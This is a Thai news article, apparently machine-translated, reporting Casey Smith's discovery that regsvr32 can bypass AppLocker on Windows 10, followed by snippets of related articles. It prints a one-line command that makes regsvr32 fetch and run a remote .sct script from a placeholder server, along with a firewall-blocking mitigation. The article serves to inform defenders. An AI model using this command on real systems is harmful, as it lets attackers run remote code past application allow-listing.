Regsvr32 สามารถใช้เลี่ยงผ่าน applocker บน windows 10
วีดีโอ: Regsvr32 Windows applocker bypassed to execute remote payload, Kali Linux 2024
นักวิจัยจากโคโลราโดที่ชื่อ Casey Smith พบว่า Regsvr32 สามารถใช้เพื่อข้าม AppLocker ใน Windows 10 และนี่เป็นปัญหาใหญ่สำหรับผู้ใช้คอมพิวเตอร์โดยเฉพาะผู้ที่อยู่ในสภาพแวดล้อมทางธุรกิจ
AppLocker เปิดตัวครั้งแรกใน Windows 7 และ Windows Server 2008 R2 มันถูกออกแบบมาเพื่อให้ผู้ดูแลระบบสามารถระบุกลุ่มหรือผู้ใช้ที่สามารถใช้ประโยชน์จากแอพพลิเคชั่นบางส่วนหรือทั้งหมดตามลักษณะเฉพาะของไฟล์ หากคุณเป็นบุคคลที่มีแนวโน้มที่จะใช้ AppLocker มันควรเป็นความรู้ทั่วไปที่สามารถใช้ในการสร้างกฎบางอย่างเพื่ออนุญาตให้แอปพลิเคชันเรียกใช้หรือหยุดพวกเขาในแทร็กของพวกเขา
สำหรับผู้ที่อาจไม่รู้ตัว Regvr32 สามารถใช้เพื่อลงทะเบียนและยกเลิกการลงทะเบียน DLLs นี่ไม่ใช่เครื่องมือแบบคลิกเดียวที่เห็นเนื่องจากเป็นยูทิลิตีบรรทัดคำสั่งดังนั้นผู้ใช้คอมพิวเตอร์ขั้นสูงเท่านั้นควรพยายามใช้ประโยชน์จากสิ่งที่มีให้
เราเข้าใจว่าการใช้เทคนิคนี้จะไม่เปลี่ยนรีจิสทรีของระบบคอมพิวเตอร์ซึ่งทำให้ผู้ดูแลระบบทราบได้ยากว่ามีการเปลี่ยนแปลงใดบ้าง
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
“ สิ่งที่น่าทึ่งในที่นี้คือ regsvr32 ทราบถึงพรอกซีแล้วใช้ TLS ตามการเปลี่ยนเส้นทาง ฯลฯ …และ…คุณคาดเดาไบนารี MS เริ่มต้นที่ลงชื่อแล้ว ดังนั้นสิ่งที่คุณต้องทำคือโฮสต์ไฟล์ your.sct ที่ตำแหน่งที่คุณควบคุม” สมิ ธ เขียน
เทคนิคข้างต้นไม่จำเป็นต้องมีสิทธิ์ของผู้ดูแลระบบและจะไม่ทำการเปลี่ยนแปลงรีจิสทรี นอกจากนี้สคริปต์สามารถเรียกใช้ผ่านทั้ง HTTP หรือ HTTPS ในขณะนี้ Microsoft ยังไม่ได้ปล่อยโปรแกรมแก้ไขสำหรับปัญหาเล็ก ๆ นี้ดังนั้นตัวเลือกเดียวในจุดนี้คือการบล็อก Regsvr32 ผ่านไฟร์วอลล์ Windows
น่าสนใจพอยักษ์ซอฟต์แวร์ยังไม่ตอบสนองต่อปัญหาด้านความปลอดภัยที่เผชิญกับระบบปฏิบัติการ ตอนนี้มันเปิดออกแล้วเราคาดว่าจะได้ยินอะไรบางอย่างจาก บริษัท พร้อมกับพูดถึงการแก้ไขในอนาคต
แก้ไข: 'regsvr32.exe มีรุ่นที่ไม่ถูกต้องโปรดแทนที่ไฟล์ด้วยสำเนาของแท้' ใน windows 10
'Regsvr32.exe' เป็นหนึ่งในข้อผิดพลาด Windows 10 นับไม่ถ้วนและมันน่ารำคาญมาก เราจะแสดงให้คุณเห็นในบทความแก้ไขนี้วิธีแก้ปัญหา
ผู้ใช้ Windows 7 บ่น kb3197868 ล้มเหลวในการติดตั้ง
Microsoft เพิ่งเปิดตัวสองอัพเดตสำหรับ Windows 7: อัพเดตด้านความปลอดภัยเท่านั้น KB3197867 และ Rollup รายเดือน KB3197868 ผู้ใช้ Windows 7 พยายามดาวน์โหลดอัปเดตเหล่านี้ทันทีที่พร้อมใช้งานเฉพาะเพื่อค้นหาว่าการติดตั้ง KB3197868 นั้นยากกว่าที่คาดไว้มาก การสะสมรายเดือน KB3197868 ไม่ได้นำคุณสมบัติของระบบใหม่ แต่รวมถึงการปรับปรุงความปลอดภัยมากมาย ...
Applocker bypass หาช่องโหว่ที่จะแก้ไขด้วยหน้าต่างหลักรุ่นถัดไป
AppLocker เป็นคุณสมบัติใน Windows OS และ Windows Servers ที่ช่วยให้ผู้ดูแลระบบสามารถควบคุมว่าผู้ใช้รายใดที่สามารถเรียกใช้แอพเฉพาะ เครื่องมือนี้ใช้เอกลักษณ์ของไฟล์และอนุญาตให้ผู้ดูแลระบบสร้างกฎเพื่ออนุญาตหรือบล็อกแอปพลิเคชัน AppLocker ช่วยให้ผู้ดูแลระบบสามารถควบคุมประเภทแอปต่อไปนี้: ไฟล์เรียกทำงาน (.exe และ. com), สคริปต์ (.js, .ps1, .vbs, .cmd, ...